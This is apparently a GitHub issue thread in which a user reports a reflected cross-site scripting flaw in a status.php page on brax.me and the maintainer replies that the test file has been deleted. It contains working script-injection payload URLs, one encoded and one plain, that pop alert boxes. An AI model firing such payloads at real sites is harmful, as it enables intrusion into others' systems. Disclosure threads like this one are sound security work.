nicolasfritzges
commented
3 years ago it truly is a xss.
payload used: https://brax.me/prod/status.php?a=%3Cscript%3Ealert(document.domain.concat(%22%5Cn%22).concat(window.origin))%3C/script%3E
Closed fd1f closed 3 years ago
nicolasfritzges
commented
3 years ago it truly is a xss.
payload used: https://brax.me/prod/status.php?a=%3Cscript%3Ealert(document.domain.concat(%22%5Cn%22).concat(window.origin))%3C/script%3E
robbraxman
commented
3 years ago Thank you. It was a test file. It is not used. It has been deleted. Appreciated!
robbraxman
commented
3 years ago File deleted
there is a weird thing on status.php, i'm not the one who found it. for example, you could go to
https://brax.me/prod/status.php?a=<script>alert('hello');document.body.innerText = "world"</script>and it would run the javascript without a care.